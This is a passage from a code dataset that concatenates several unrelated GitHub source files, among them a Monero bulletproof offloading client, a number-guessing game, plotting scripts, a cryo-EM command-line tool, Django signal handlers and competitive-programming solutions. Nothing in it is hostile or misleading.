isprime(i):\n\t\tnumber_of_primes+=1\n\telse:\n\t\tcomposites.append(i)\n\t\t\ns=0\n\nif number_of_primes!=0 and len(composites)!=0:\n\ts=(number_of_primes/list_gcd(composites))*len(n)\n\t\nprint(GIF(s))","repo_name":"SumukhPrasad/DiPS-CodeJam-2023","sub_path":"06-array-significance/sampleSolution.py","file_name":"sampleSolution.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32933749243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Dusan Klinec, ph4r05, 2018\n# Bulletproof offloading client\n\nimport os\nimport time\nimport logging\nimport binascii as ubinascii\nfrom monero_serialize.core.message_types import MessageType\nfrom monero_serialize.xmrtypes import ECKey, KeyV\n\nfrom monero_glue.hwtoken import misc as tmisc\nfrom monero_glue.xmr import crypto, monero, wallet\nfrom monero_glue.xmr import bulletproof as bp\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BulletproofFull(MessageType):\n __slots__ = ['V', 'A', 'S', 'T1', 'T2', 'taux', 'mu', 'L', 'R', 'a', 'b', 't']\n MFIELDS = [\n ('V', KeyV),\n ('A', ECKey),\n ('S', ECKey),\n ('T1', ECKey),\n ('T2', ECKey),\n ('taux', ECKey),\n ('mu', ECKey),\n ('L', KeyV),\n ('R', KeyV),\n ('a', ECKey),\n ('b', ECKey),\n ('t', ECKey),\n ]\n\n\n_tmp_bf_0 = bytearray(32)\n_tmp_bf_1 = bytearray(32)\n\n_tmp_pt_1 = crypto.new_point()\n_tmp_pt_2 = crypto.new_point()\n_tmp_pt_3 = crypto.new_point()\n_tmp_pt_4 = crypto.new_point()\n\n_tmp_sc_1 = crypto.new_scalar()\n_tmp_sc_2 = crypto.new_scalar()\n_tmp_sc_3 = crypto.new_scalar()\n_tmp_sc_4 = crypto.new_scalar()\n\n\ndef comp_fold_idx(batching, nprime, i):\n ia0 = 32 * (i * batching)\n ia1 = ia0 + 32 * batching\n ib0 = 32 * (i * batching + nprime)\n ib1 = ib0 + 32 * batching\n return ia0, ia1, ib0, ib1\n\n\ndef comp_folding(rrcons, nprime, v, ix):\n # Compute folding all in memory\n # Gp_{LO, i} = m_0 bl0^{-1} w G_i + m_0 bl1^{-1} w^{-1} G_{i+h}\n # Gp_{HI, i} = m_1 bl0^{-1} w G_i + m_1 bl1^{-1} w^{-1} G_{i+h}\n P0, P1 = v.slice_view(0, nprime//2), v.slice_view(nprime, nprime + nprime//2)\n P2, P3 = v.slice_view(nprime//2, nprime), v.slice_view(nprime + nprime//2, nprime * 2)\n D0, D1 = v.slice_view(0, nprime//2), v.slice_view(nprime//2, nprime)\n a0, a1 = rrcons[4*ix+0], rrcons[4*ix+1]\n a2, a3 = rrcons[4*ix+2], rrcons[4*ix+3]\n\n if ix in (0, 1):\n bp.hadamard_fold(P0, a=a0, b=a1, into=D0, vR=P1, full_v=True)\n bp.hadamard_fold(P2, a=a2, b=a3, into=D1, vR=P3, full_v=True)\n else:\n bp.scalar_fold(P0, a=a0, b=a1, into=D0, vR=P1, full_v=True)\n bp.scalar_fold(P2, a=a2, b=a3, into=D1, vR=P3, full_v=True)\n v.resize(nprime)\n return v\n\n\ndef comp_offdots(Gprime, Hprime, aprime, bprime, nprime):\n # Computing dot products in-memory, blinded\n npr2 = nprime * 2\n cL = bp.inner_product(\n aprime.slice_view(0, nprime), bprime.slice_view(nprime, npr2), None\n )\n\n cR = bp.inner_product(\n aprime.slice_view(nprime, npr2), bprime.slice_view(0, nprime), None\n )\n\n LcA = bp.vector_sum_aA(None, aprime.slice_view(0, nprime), Gprime.slice_view(nprime, npr2))\n LcB = bp.vector_sum_aA(None, bprime.slice_view(nprime, npr2), Hprime.slice_view(0, nprime))\n\n RcA = bp.vector_sum_aA(None, aprime.slice_view(nprime, npr2), Gprime.slice_view(0, nprime))\n RcB = bp.vector_sum_aA(None, bprime.slice_view(0, nprime), Hprime.slice_view(nprime, npr2))\n return cL, cR, LcA, LcB, RcA, RcB\n\n\ndef dechunk_res(buffers, exp_res=1):\n if not buffers or not isinstance(buffers, (list, tuple)):\n return buffers\n\n ln = len(buffers)\n cres = [bytearray() for _ in range(exp_res)]\n for c in range(exp_res):\n cbuff = buffers[c] if exp_res > 1 else buffers\n if not isinstance(cbuff, (list, tuple)):\n cres[c] += cbuff\n continue\n\n for i in range(len(cbuff)):\n cres[c] += cbuff[i]\n\n return cres if exp_res > 1 else cres[0]\n\n\ndef vect_clone(dst, src):\n dst = bp.ensure_dst_keyvect(dst, len(src))\n for i in range(len(src)):\n dst.read(i, src.to(i))\n return dst\n\n\ndef count_bytes(buffers):\n if buffers is None:\n return 0\n if isinstance(buffers, (list, tuple)):\n return sum([count_bytes(x) for x in buffers])\n elif isinstance(buffers, (bytearray, bytes, str)):\n return len(buffers)\n else:\n logger.debug(\"Unknown type for count_bytes(): %s \" % (type(buffers),))\n return 0\n\n\nclass BulletproofClient:\n def __init__(self, m=1, messenger=None):\n # Main sending coroutine\n # Arguments: p1, p2, params, buffers\n self.messenger = messenger\n\n self.off_method = 3\n self.nprime_thresh = 64\n self.batching = 32\n self.off2_thresh = 32\n self.M = m\n self.MN = 64 * self.M\n\n self.is_debug = True\n self.do_timing = True\n self.time_start = None\n self.timing_bins = {}\n self.n_msgs = 0\n self.n_sent = 0\n self.n_recv = 0\n self.prove_time = 0\n\n async def comm(self, p1=0, p2=0, params=None, buffers=None):\n return await self.messenger(p1, p2, params, buffers)\n\n async def bp_tx_buffers(self, buffers=None):\n buffers = buffers if buffers else []\n self.n_msgs += 1\n self.n_sent += count_bytes(buffers)\n r = await self.comm(p1=1, p2=0, buffers=buffers)\n self.n_recv += count_bytes(r)\n return r\n\n async def bp_final(self):\n self.n_msgs += 1\n r = await self.comm(p1=1, p2=0)\n self.n_recv += count_bytes(r)\n return r\n\n async def bp_start(self, ln, offm=2, nprime_thresh=32, off2_thresh=32, batching=32):\n self.n_msgs += 1\n r = await self.comm(p1=0, p2=ln, params=[offm, nprime_thresh, off2_thresh, batching])\n self.n_recv += count_bytes(r)\n return r\n\n async def compute_bp(self):\n ln = self.M\n self.MN = 64 * ln\n\n bpi = bp.BulletProofBuilder()\n l = bytearray()\n r = bytearray()\n aprime = l\n bprime = r\n logger.debug('Batching: %s, MN: %s, chunks: %s, M: %s' % (self.batching, self.MN, self.MN // self.batching, ln))\n\n ttstart = time.time()\n l0, r0 = dechunk_res(await self.bp_start(ln, self.off_method, self.nprime_thresh, self.off2_thresh, self.batching), 2)\n l += l0\n r += r0\n\n for i in range(1, self.MN // self.batching):\n logger.debug('.. l, r: %s' % i)\n l0, r0 = dechunk_res(await self.bp_tx_buffers(None), 2)\n l += l0\n r += r0\n\n logger.debug('l, r finished')\n rrcons = await self.bp_tx_buffers(None)\n logger.debug('Phase 1 finishing: %s' % rrcons)\n logger.debug('Phase 1 finished')\n\n y = rrcons[0] if rrcons and len(rrcons) > 0 else None\n\n # First while-loop iteration, dot-product computation, lC, lR, Lc, Lr, w, winv\n if self.off_method == 0:\n # round 0 - aLow, bHigh\n logger.debug('r0, cLcR aLow')\n for i in range(self.MN // self.batching // 2):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, self.MN // 2, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers((l[ia0:ia1], r[ib0:ib1]))\n logger.debug(rrcons)\n\n # round 0 - aHigh, bLow\n logger.debug('r0, cLcR aHigh')\n for i in range(self.MN // self.batching // 2):\n ib0, ib1, ia0, ia1 = comp_fold_idx(self.batching, self.MN // 2, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers((l[ia0:ia1], r[ib0:ib1]))\n logger.debug(rrcons)\n\n else:\n # round 0 - aLow, bHigh; aHigh, bLow in memory\n logger.debug('r0, cLcR off, nprime: %s' % str(self.MN // 2))\n yinvpow = vect_clone(None, bp.KeyVPowers(self.MN, bp.invert(None, y)))\n Gprec = vect_clone(None, bpi._gprec_aux(self.MN))\n Hprec = vect_clone(None, bpi._hprec_aux(self.MN))\n Hprime = vect_clone(None, bp.KeyVEval(self.MN, lambda i, d: bp.scalarmult_key(d, Hprec[i], yinvpow[i])))\n\n cL, cR, LcA, LcB, RcA, RcB = comp_offdots(Gprec, Hprime, bp.KeyV(self.MN, l), bp.KeyV(self.MN, r), self.MN // 2)\n rrcons = await self.bp_tx_buffers((cL, cR, LcA, LcB, RcA, RcB))\n logger.debug(rrcons)\n\n # round 0 folding, G, H, a, b\n Gprime = bytearray()\n Hprime = bytearray()\n app = bytearray()\n bpp = bytearray()\n cbatch = max(1, self.MN // 2 // self.batching // 2)\n\n logger.debug('r0, fold G')\n for i in range(cbatch):\n cres = dechunk_res(await self.bp_tx_buffers(None))\n if cres: Gprime += cres\n\n logger.debug('r0, fold H')\n for i in range(cbatch):\n cres = dechunk_res(await self.bp_tx_buffers(None))\n if cres: Hprime += cres\n\n Gprime = bp.KeyV(self.MN // 2, Gprime)\n Hprime = bp.KeyV(self.MN // 2, Hprime)\n\n if self.off_method == 3:\n logger.debug('r0 in-mem meth3 fold Gprime')\n Gprec = vect_clone(None, bpi._gprec_aux(self.MN))\n comp_folding(rrcons, self.MN // 2, Gprec, 0)\n\n logger.debug('r0 in-mem meth3 fold Hprime')\n Hprec_ = vect_clone(None, bpi._hprec_aux(self.MN))\n ypowinv = vect_clone(None, bp.KeyVPowers(self.MN, bp.invert(_tmp_bf_0, y)))\n Hprec = vect_clone(None, bp.KeyVEval(self.MN, lambda i, d: bp.scalarmult_key(d, Hprec_.to(i), yinvpow[i])))\n comp_folding(rrcons, self.MN // 2, Hprec, 1)\n\n logger.debug('r0 in-mem meth3 correct G, H')\n for i in range(self.MN // 2):\n crypto.decodepoint_into(_tmp_pt_1, Gprec.to(i))\n crypto.decodepoint_into(_tmp_pt_2, Gprime.to(i))\n crypto.point_sub_into(_tmp_pt_1, _tmp_pt_1, _tmp_pt_2)\n crypto.encodepoint_into(_tmp_bf_0, _tmp_pt_1)\n Gprime.read(i, _tmp_bf_0)\n\n crypto.decodepoint_into(_tmp_pt_1, Hprec.to(i))\n crypto.decodepoint_into(_tmp_pt_2, Hprime.to(i))\n crypto.point_sub_into(_tmp_pt_1, _tmp_pt_1, _tmp_pt_2)\n crypto.encodepoint_into(_tmp_bf_0, _tmp_pt_1)\n Hprime.read(i, _tmp_bf_0)\n\n if self.off_method >= 2:\n logger.debug('in-mem fold for a, b')\n aprime = bp.KeyV(self.MN, l)\n bprime = bp.KeyV(self.MN, r)\n comp_folding(rrcons, self.MN // 2, aprime, 2)\n comp_folding(rrcons, self.MN // 2, bprime, 3)\n\n else:\n logger.debug('r0, fold a')\n for i in range(self.MN // self.batching // 2):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, self.MN // 2, i)\n cres = dechunk_res(await self.bp_tx_buffers((aprime[ia0:ia1], aprime[ib0:ib1])))\n if cres: app += cres\n\n logger.debug('r0, fold b')\n for i in range(self.MN // self.batching // 2):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, self.MN // 2, i)\n cres = dechunk_res(await self.bp_tx_buffers((bprime[ia0:ia1], bprime[ib0:ib1])))\n if cres: bpp += cres\n\n aprime = bp.KeyV(self.MN // 2, app)\n bprime = bp.KeyV(self.MN // 2, bpp)\n\n logger.debug('0PC r: %s, ap %s %s' % (0, len(aprime), ubinascii.hexlify(aprime.d[-64:])))\n logger.debug('0PC r: %s, bp %s %s' % (0, len(bprime), ubinascii.hexlify(bprime.d[-64:])))\n logger.debug('0PC r: %s, Gp %s %s' % (0, len(Gprime), ubinascii.hexlify(Gprime.d[-64:])))\n logger.debug('0PC r: %s, Hp %s %s' % (0, len(Hprime), ubinascii.hexlify(Hprime.d[-64:])))\n\n # Loops:\n # - clcr part, compute blinded cL, cR, LcA, LcB, RcA, RcB\n nprime = self.MN // 4\n round = 0\n while round == 0 or nprime >= self.nprime_thresh or (self.off_method >= 2 and nprime >= self.off2_thresh):\n npr2 = nprime * 2\n round += 1\n\n logger.debug('Client, BPI nprime: %s, CLI nprime: %s, |Gprime|: %s' % (nprime, nprime, len(Gprime)))\n if self.off_method == 0:\n # round 0 - aLow, bHigh\n logger.debug('r%s, cLcR aLow' % round)\n for i in range(nprime // self.batching):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, nprime, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers(\n (aprime.d[ia0:ia1], bprime.d[ib0:ib1], Gprime.d[ib0:ib1], Hprime.d[ia0:ia1]))\n logger.debug(rrcons)\n\n # round 0 - aHigh, bLow\n logger.debug('r%s, cLcR aHigh' % round)\n for i in range(nprime // self.batching):\n ib0, ib1, ia0, ia1 = comp_fold_idx(self.batching, nprime, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers(\n (aprime.d[ia0:ia1], bprime.d[ib0:ib1], Gprime.d[ib0:ib1], Hprime.d[ia0:ia1]))\n logger.debug(rrcons)\n\n else:\n # Computing dot products in-memory, blinded\n cL, cR, LcA, LcB, RcA, RcB = comp_offdots(Gprime, Hprime, aprime, bprime, nprime)\n logger.debug('clcr step, r %s' % round)\n rrcons = await self.bp_tx_buffers((cL, cR, LcA, LcB, RcA, RcB))\n logger.debug(rrcons)\n\n for ix, v in enumerate((Gprime, Hprime, aprime, bprime)):\n logger.debug('Folding IX: %s, r %s' % (ix, round))\n\n # Offloaded folding up to batching limit / limit defined by Trezor\n # Can be e.g. 8 elements. Remaining 8 computed in memory in the Trezor\n if self.off_method >= 2 and rrcons:\n logger.debug('.. PC: in-memory fold, len: %s; %s' % (len(v), nprime))\n comp_folding(rrcons, nprime, v, ix)\n\n if ix == 3:\n nprime >>= 1\n continue\n\n # Ordinary folding for methods [0, 1]\n bf = v.d\n nf = bytearray()\n cbatching = min(self.batching, nprime)\n for i in range(max(1, nprime // cbatching)):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, nprime, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n\n lo = bf[ia0:ia1]\n hi = bf[ib0:ib1]\n\n cres = dechunk_res(await self.bp_tx_buffers((lo, hi)))\n if cres:\n nf += cres\n\n nf = bp.KeyV(nprime // 2, nf)\n if ix == 0:\n Gprime = nf\n elif ix == 1:\n Hprime = nf\n elif ix == 2:\n aprime = nf\n elif ix == 3:\n bprime = nf\n nprime >>= 1\n\n logger.debug('wPC r: %s, ap %s %s' % (round, len(aprime), ubinascii.hexlify(aprime.d[-64:])))\n logger.debug('wPC r: %s, bp %s %s' % (round, len(bprime), ubinascii.hexlify(bprime.d[-64:])))\n logger.debug('wPC r: %s, Gp %s %s' % (round, len(Gprime), ubinascii.hexlify(Gprime.d[-64:])))\n logger.debug('wPC r: %s, Hp %s %s' % (round, len(Hprime), ubinascii.hexlify(Hprime.d[-64:])))\n\n proof = await self.bp_final()\n proof = await tmisc.parse_msg(proof[0], BulletproofFull())\n self.prove_time = time.time() - ttstart\n return proof\n\n\nclass BulletproofMPCRunner:\n def __init__(self):\n self.state = None\n self.prev_mem = 0\n self.cur_mes = 0\n\n def bpp(self, instance=None):\n if instance:\n self.state = instance\n return self.state\n\n def check_mem(self, x):\n # gc.collect()\n free = 0 # gc.mem_free()\n diff = self.prev_mem - free\n logger.debug(\n \"======= {} {} Diff: {} Free: {} Allocated: {}\".format(\n self.cur_mes, x, diff, free, '?', # gc.mem_alloc()\n ),\n )\n # micropython.mem_info()\n # gc.collect()\n self.cur_mes += 1\n self.prev_mem = free\n\n def log_trace(self, x=None):\n logger.debug(\n \"Log trace %s, ... F: %s A: %s, S: %s\",\n x,\n '?', # gc.mem_free(),\n '?', # gc.mem_alloc(),\n '?', # micropython.stack_use(),\n )\n\n async def step(self, p1=0, p2=2, params=None, buffers=None):\n if p1 == 0:\n self.bpp(None) # clear old state\n\n self.check_mem(\"+++BP START: %s; %s\" % (p1, p2))\n # gc.collect()\n self.log_trace(\"BP START\")\n\n # Crypto function call number reporting not implemented here\n # It is in git: ph4r05/trezor-firmware/pr/bpoff-counting-exp\n\n bpi, res = None, None\n if p1 == 0:\n # crypto.report_reset()\n bp.set_prng(crypto.prng(bp.ZERO))\n bpi = bp.BulletProofBuilder()\n # bpi.gc_fnc = gc.collect\n bpi.gc_trace = self.log_trace\n sv = [crypto.sc_init(137 * i) for i in range(p2)]\n gamma = [crypto.sc_init(991 * i) for i in range(p2)]\n\n bpi.off_method = 2 if not params and len(params) <= 1 else params[0]\n if params and len(params) >= 4:\n bpi.nprime_thresh = params[1]\n bpi.off2_thresh = params[2]\n bpi.batching = params[3]\n\n res = bpi.prove_batch_off(sv, gamma, buffers)\n # crypto.report()\n state = bpi.dump_state()\n # del (bp, bpi)\n # gc.collect()\n self.log_trace(\"BP STATE\")\n self.bpp((state, None))\n # self.bpp((state, crypto.report_get()))\n # del (crypto)\n # gc.collect()\n self.log_trace(\"BP STATE2\")\n\n else:\n # crypto.report_reset()\n state, fncs = self.bpp()\n bpi = bp.BulletProofBuilder()\n bpi.load_state(state)\n del (state)\n self.bpp(None)\n # gc.collect()\n self.log_trace(\"From state\")\n\n # bp.PRNG = crypto.prng(bp._ZERO)\n # bpi.gc_fnc = gc.collect\n bpi.gc_trace = self.log_trace\n\n # crypto.report_reset()\n # crypto.report_set(fncs)\n res = bpi.prove_batch_off_step(buffers)\n # crypto.report()\n state = bpi.dump_state()\n del bpi\n # del (bp, bpi)\n # gc.collect()\n self.log_trace(\"BP STATE\")\n self.bpp((state, fncs))\n # del (crypto)\n # gc.collect()\n self.log_trace(\"BP STATE2\")\n\n # gc.collect()\n self.log_trace(\"BP STEP\")\n self.check_mem(\"+++BP STEP\")\n if isinstance(res, tuple) and res[0] == 1:\n from monero_glue.hwtoken import misc as tmisc\n B = res[1]\n B2 = BulletproofFull()\n B2.V = B.V\n B2.S = B.S\n B2.A = B.A\n B2.T1 = B.T1\n B2.T2 = B.T2\n B2.taux = B.taux\n B2.mu = B.mu\n B2.L = B.L\n B2.R = B.R\n B2.a = B.a\n B2.b = B.b\n B2.t = B.t\n res = await tmisc.dump_msg(B2)\n\n msg = None\n if res:\n msg = res if isinstance(res, (list, tuple)) else [res]\n return msg\n","repo_name":"ph4r05/monero-agent","sub_path":"monero_glue/xmr/bulletproof_cl.py","file_name":"bulletproof_cl.py","file_ext":"py","file_size_in_byte":19327,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"47"} +{"seq_id":"7429813436","text":"import random\n\nclass GuessGame(object):\n\t\"\"\"Guessing Game\"\"\"\n\t\n\tdef __init__(self):\n\t\tself.number = random.randint(0,10)\n\t\tself.players = []\n\t\t\n\tdef startGame(self, numPlayers):\n\t\t# create list of players\n\t\t\n\t\tfor i in range(0, numPlayers):\n\t\t\ts = Player()\n\t\t\tself.players.append(s)\n\t\t\t\n\t\tfor i in range(0, 1000):\n\t\t\tfor j in range(0, numPlayers):\n\t\t\t\t# prints old, asks for guess then verifies\n\t\t\t\tprint(\"------------------------------------------\")\n\t\t\t\tprint(\"---Player %s---\" % (j+1))\n\t\t\t\tprint(\"Current Guess:\", (self.players[j]).number)\n\t\t\t\t\n\t\t\t\t# prompt for input and check whether correct\n\t\t\t\t(self.players[j]).number = (self.players[j]).guess()\n\t\t\t\tif (self.players[j]).number == self.number:\n\t\t\t\t\tprint(\"\\nYou guessed right! The number is %s\\n\" % self.number)\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\nWRONG!\\n\")\n\t\t\t\t\n\t\t\t\t\n\t\treturn False # game did not complete\t\t\n\nclass Player(object):\n\t\"\"\" Player object\"\"\"\n\tdef __init__(self):\n\t\tself.number = -1 # guessed number\n\t\n\tdef guess(self):\n\t\tplayerGuessNum = -1\n\t\twhile True:\n\t\t\tplayerGuessNum = input(\"Enter Guess: \")\n\t\t\tplayerGuessNum = int(playerGuessNum)\n\t\t\t\n\t\t\t# check\n\t\t\tif playerGuessNum >= 0 and playerGuessNum <= 9:\n\t\t\t\tbreak\n\t\t\t\t\n\t\t\tprint(\"INVALID INPUT: must be from 0 through 9\")\n\t\t\t\n\t\treturn playerGuessNum\n\n\n#initialize game\ngame1 = GuessGame()\n\n# asks for number of players\nwhile True:\n\tnumberPlayers = int(input(\"Enter number of players:\"))\n\tif numberPlayers >= 1:\n\t\tbreak\n\t\n\tprint(\"INVALID INPUT: must be greater or equal to 1\")\n\ngameFinished = game1.startGame(numberPlayers)\n\nif gameFinished == False:\n\tprint(\"Game did not finish.\")\nelse:\n\tprint(\"Game over.\")","repo_name":"williamrobotma/number-guess-python","sub_path":"GuessGameLauncher.py","file_name":"GuessGameLauncher.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35557973222","text":"#!/usr/bin/env python\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nGRAPH_TITLE = \"Execution Time vs Width\"\nX_TITLE = \"Width\"\nY_TITLE = \"Execution time (s)\"\n\n#----------------------------------------------------------------------\n# Butterfly image execution time graph\n#----------------------------------------------------------------------\nbutterfly_data = pd.read_csv(\"butterfly_execution_time.csv\")\n\nx = butterfly_data.iloc[:,0]\ny_serial = butterfly_data.iloc[:,1]\ny_parallel = butterfly_data.iloc[:,2]\n\nplt.figure(figsize=(5,3), dpi=100)\nplt.gcf().subplots_adjust(bottom=0.16)\n\nplt.plot(x, y_serial, label=\"Serial time\")\nplt.plot(x, y_parallel, label=\"Parallel time\")\n\nplt.grid(True)\n\nplt.title(GRAPH_TITLE)\nplt.xlabel(X_TITLE)\nplt.ylabel(Y_TITLE)\nplt.legend()\n\nplt.savefig(\"butterfly-execution-time-graph.png\", dpi=300)\n\nplt.show()\n\n#----------------------------------------------------------------------\n# Radiograph image execution time graph\n#----------------------------------------------------------------------\nradiograph_data = pd.read_csv(\"radiograph_execution_time.csv\")\n\nx = radiograph_data.iloc[:,0]\ny_serial = radiograph_data.iloc[:,1]\ny_parallel = radiograph_data.iloc[:,2]\n\nplt.figure(figsize=(5,3), dpi=100)\nplt.gcf().subplots_adjust(bottom=0.16)\n\nplt.plot(x, y_serial, label=\"Serial time\")\nplt.plot(x, y_parallel, label=\"Parallel time\")\n\nplt.grid(True)\n\nplt.title(GRAPH_TITLE)\nplt.xlabel(X_TITLE)\nplt.ylabel(Y_TITLE)\nplt.legend()\n\nplt.savefig(\"radiograph-execution-time-graph.png\", dpi=300)\n\nplt.show()\n","repo_name":"AaronSolera/MeanFilterVectorization","sub_path":"graphic_results.py","file_name":"graphic_results.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72903095183","text":"import global_def\nfrom global_def import *\nfrom optparse import OptionParser\nfrom EMAN2_cppwrap import *\n\nimport os\nimport sys\n\n \ndef main():\n\tprogname = os.path.basename(sys.argv[0])\n\tusage = progname + \" prj_stack .. average eigvol output_factcoords --rad=radius --neigvol=number_of_eigvol --CTF\"\n\tparser = OptionParser(usage, version=SPARXVERSION)\n\tparser.add_option(\"--rad\", type=\"int\", default=-1, help=\"radius of mask\")\n\tparser.add_option(\"--neigvol\", type=\"int\", default=-1, help=\"number of eigvenvectors to use (default all)\")\n\tparser.add_option(\"--fl\", type=\"float\", default=0.0, help=\"cut-off frequency of hyperbolic tangent low-pass Fourier filter\")\n\tparser.add_option(\"--aa\", type=\"float\", default=0.0, help=\"fall-off of hyperbolic tangent low-pass Fourier filter\")\n\tparser.add_option(\"--CTF\", action=\"store_true\", default=False, help=\"Use CTF\")\n\tparser.add_option(\"--MPI\", action=\"store_true\", help=\"use MPI\")\n\n\t(options, args) = parser.parse_args()\n\n\tif( len(args) < 4 ):\n\t\tprint(\"usage: \" + usage)\n\t\tprint(\"Please run '\" + progname + \" -h' for details\")\n\telse:\n\t\tstacks = args[0:-3]\n\t\tavgvol = args[-3]\n\t\teigvol = args[-2]\n\t\toutput = args[-1]\n\t\t\n\t\tif options.rad < 0:\n\t\t\tprint(\"Error: mask radius is not given\")\n\t\t\tsys.exit(-1)\n\t\tif global_def.CACHE_DISABLE:\n\t\t\tfrom utilities import disable_bdb_cache\n\t\t\tdisable_bdb_cache()\n\t\tif options.MPI:\n\t\t\tfrom mpi import mpi_init\n\t\t\tsys.argv = mpi_init(len(sys.argv), sys.argv)\n\n\t\tfrom utilities import get_im\n\t\tglobal_def.BATCH = True\n\t\tif( get_im( stacks[0]).get_zsize() == 1 and get_im( eigvol).get_zsize() > 1):\n\t\t\tfrom applications import factcoords_prj\n\t\t\tfactcoords_prj(stacks, avgvol, eigvol, output, options.rad, options.neigvol, options.fl, options.aa, options.CTF, options.MPI)\n\t\telse:\n\t\t\tfrom applications import factcoords_vol\n\t\t\tfactcoords_vol(stacks, avgvol, eigvol, output, options.rad, options.neigvol, options.fl, options.aa, options.MPI)\n\t\tglobal_def.BATCH = False\n\t\t\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"cryoem/eman2","sub_path":"sparx/bin/sxfactcoords.py","file_name":"sxfactcoords.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"47"} +{"seq_id":"6385883697","text":"# encoding: utf-8\n\"\"\"\n@desc: 评论模块信号\n\"\"\"\n\nfrom django.db.models.signals import m2m_changed\nfrom django.dispatch import receiver\n\nfrom .models import Review, Reply\n\n\n@receiver(m2m_changed, sender=Review.like_users.through)\ndef review_like_users_changed(sender, instance, **kwargs):\n \"\"\"\n 当评论喜欢数据发送变化时,更新其对应的人数\n :param sender:\n :param instance:\n :param kwargs:\n :return:\n \"\"\"\n instance.like_count = instance.like_users.count()\n instance.save()\n\n\n@receiver(m2m_changed, sender=Reply.like_users.through)\ndef reply_like_users_changed(sender, instance, **kwargs):\n \"\"\"\n 当回复喜欢数据发送变化时,更新其对应的人数\n :param sender:\n :param instance:\n :param kwargs:\n :return:\n \"\"\"\n instance.like_count = instance.like_users.count()\n instance.save()\n","repo_name":"menial-love/Django","sub_path":"reviews/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"8955371551","text":"import sys\nsys.stdin = open('input.txt')\n\n'''\n필요한 기능\n1. 해당 좌표에서 최대 벌꿀\n2. 순회하는 기능\n'''\n\ndef get_value(idx, M, C):\n visit = [0] * M\n idx_all = []\n for i in range(M):\n idx_all.append([idx[0],idx[1]+i])\n result_end = 0\n for i in range(M, 0,-1):\n def get_combi(n, start, temp,temp2, C):\n nonlocal visit # 모든 조합의 경우의 수를 구하는 함수\n nonlocal idx_all\n nonlocal result_end\n if len(temp) == n: # 조합의 개수가 원하는 수가 되는 함수 종료\n if sum(temp) > C:\n return\n else:\n if sum(temp2) >= result_end:\n result_end = sum(temp2)\n return\n for k in range(start, len(idx_all)): # start부터 순회하는데 다음 재귀를 호출 할 떄는 현재 i가 순회 시작점이 됨\n if visit[k] == 0:\n visit[k] = 1\n get_combi(n, k, temp + [arr[idx_all[k][0]][idx_all[k][1]]],temp2 + [(arr[idx_all[k][0]][idx_all[k][1]])**2], C)\n visit[k] = 0\n get_combi(i,0,[],[],C)\n\n return result_end\n\nT = int(input())\n\nfor tc in range(T):\n N, M, C = map(int, input().split())\n\n arr = [list(map(int, input().split())) for _ in range(N)]\n visited = [[0]*(N-M+1) for _ in range(N)]\n dp = [[-1]*(N-M+1) for _ in range(N)]\n\n result_arr = [[0]*(N-M+1) for _ in range(N)]\n for i in range(N):\n for j in range(N-M+1):\n for m in range(M):\n if j+m < N-M+1:\n visited[i][j+m] = 1\n if 0 <= j-m:\n visited[i][j-m] = 1\n if dp[i][j] == -1:\n dp[i][j] = get_value([i,j], M, C)\n\n dp2 = [[-1] * (N - M + 1) for _ in range(N)]\n for p in range(N):\n for q in range(N-M+1):\n if visited[p][q] == 1:\n continue\n else:\n if dp[p][q] == -1:\n dp[p][q] = get_value([p,q], M ,C)\n dp2[p][q] = dp[p][q]\n result_arr[i][j] = dp[i][j]+max(list(map(lambda n:max(n),dp2)))\n print(f'#{tc+1} {max(list(map(lambda n:max(n),result_arr)))}')\n\n\n\n","repo_name":"shoon95/algorithm-solving","sub_path":"swea/swea2115_벌꿀 채취/swea2115.py","file_name":"swea2115.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8536646213","text":"from connectors.generic import XMLConnector\nfrom sqlwrapper import *\nfrom connectors.generic import GenericBook\n\nclass Czytio(XMLConnector):\n\n #dict of xml_tag -> db_column_name translations\n xml_tag_dict = {\n 'external_id': ('./id', None),\n 'title': ('./title', ''),\n 'url': ('./url', ''),\n 'authors': ('./authors', ''),\n 'formats': ('./format', ''),\n 'isbns': ('./isbn', ''),\n 'cover': ('./cover', ''),\n 'price': ('./price', 0),\n 'file_size': ('./size', 0),\n 'page_count' : ('./length', 0),\n }\n\nBase = SqlWrapper.getBaseClass()\n\nclass CzytioBook(GenericBook, Base):\n id = Column(Integer, primary_key = True)\n #title\n #url\n #authors\n #cover\n price = Column(Integer) #GROSZE!!!\n file_size = Column(Integer)\n page_count = Column(Integer) 